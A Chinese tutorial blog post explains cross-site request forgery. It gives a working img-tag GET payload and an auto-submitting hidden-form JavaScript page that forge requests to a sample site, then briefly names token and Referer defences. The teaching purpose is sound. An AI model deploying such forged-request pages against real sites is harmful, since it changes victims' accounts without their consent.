什么是CSRF?怎么防止CSRF攻击


CSRF(Cross-site request forgery):中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF;

概述

CSRF攻击涉及用户受害者、受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话的同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到受信任的站点,从而破话用户的信息。

CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害者会同时访问恶意网站与受信任的站点会话的时候。攻击包括一系列步骤,如下:

1.受害者用户使用他/她的用户名和密码登录到可信站点,从而创建一个新的会话。
2.受信任站点存储受害者会话的 cookie 或 session 在受害者用户的 web 浏览器端。
3.受害者用户在不退出信任网站时就去访问恶意网站。
4.恶意网站的网页发送一个请求到受害者的受信任的站点用户的浏览器。
5.web 浏览器将自动连接会话 cookie,因为它是恶意的要求针对可信站点。
6.受信任的站点如果受到 CSRF 攻击,攻击者的一些恶意的请求会被攻击者发送给信任站点。

恶意网站可以建立HTTP GET或POST请求到受信任的站点。一些HTML标签,比如img iframe,框架,形式没有限制的URL,可以在他们的使用属性中。img,iframe,框架可用于构造GET请求。HTML表单标签可用于构造POST请求。构造GET请求是相对容易的,因为它甚至不需要JavaScript的帮助;构造POST请求需要JavaScript。因为Collabtive只针对后者,本文章的内容将只涉及HTTP POST请求。

例子1:

有两个用户,Alice与Boby。Boby想与Alice成为好友,但是Alice拒绝添加Boby;这时Boby需要发送一个URL给Alice,当Alice访问这个URL后,Boby就自动添加到好友列表中(注意Alice不用点击任何东西,只要访问URL就自动添加好友)。
先我们要知道如何添加好友:
比如一个没有任何防御机制的GET请求如下:

http://mmc.com/action/friends/add?friend=40&__elgg_ts=15248176

在实际交互的中,如果两个用户互相添加,则彼此成为好友,所以这里写一段代码,写入自己的id,写成一个url给Alicec,当Alicec点击打开时会向服务器发送了一个add get请求,代码如下:

//根据你实际的id 填写
<html>
<img src="http://mmc.com/action/friends/add?friend=44&__elgg_ts=15248176">
</html>

例子2:

Alice用户有一个自己的描述,她希望Boby也编辑自己的描述,但是Boby用户拒绝了,这时Alice想通过发送一个 url 让Boby用户访问后,让Boby自动添加自己的描述。
首先我们需要知道编辑自己的描述需要的请求,使用抓包工具抓取所需要的参数:
当然这里的例子都是那些没有做防御机制的应用,只是为了介绍scrf

//如果一个post 的请求http://mmc.com/action/friends/set
//所传入的参数如下:
{
  uid:1,
  name:'磨磨虫',
  age:23,
  site:'深圳',
  ...
}

通过分析我们可以得知编辑用户需要的请求,其中最重要的就是uid,于是可以发送如下代码给Boby,
如何得到Boby的uid,例子一可以抓包得到,这个相信大家都明白了。

<html><body><h1>
This page forges an HTTP POST request.
</h1>
<script type="text/javascript">
function post(url,fields)
{
//create a <form> element.
var p = document.createElement("form");
//construct the form
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";

        //append the form to the current page.
document.body.appendChild(p);
//submit the form
p.submit();
}
function csrf_hack()
{
var fields;
// The following are form entries that need to be filled out
// by attackers. The entries are made hidden, so the victim
// won't be able to see them.
fields += "<input type='hidden' name='name' value='Boby'>";
fields += "<input type='hidden' name='site' value='长沙'>";
fields += "<input type='hidden' name='age' value='24'>";
fields += "<input type='hidden' name='uid' value='40'>";
var url = "http://mmc.com/action/friends/set";
post(url,fields);
}
// invoke csrf_hack() after the page is loaded.
window.onload = function() { csrf_hack();}
</script>
</body></html>

这个时候Boby打开Alice的链接,就会发送Post请求去修改自己的信息。

那又如何去防止csrf攻击呢?

针对CSRF的防御并不难,这里有几个常见的方法:
加密令牌:web应用程序可以在网页中嵌入一个加密的令牌,所有的请求都包含这个加密令牌,由于跨站请求无法获取这个令牌,所以伪造的请求很容易就被服务器识别;
Referer头途径:使用web应用程序也可以验证请求来源页面的Referer,然后由于隐私考虑,这个referer经常被客户端过滤;
防止csrf攻击的具体内容可以自行去研究一下,虽用过Node 写过加密令牌,但深知自身涉后端不深,如果有兴趣可以看一下阮一峰jwt.

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,468评论 5 473
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,620评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,427评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,160评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,197评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,334评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,775评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,444评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,628评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,459评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,508评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,210评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,767评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,850评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,076评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,627评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,196评论 2 341

推荐阅读更多精彩内容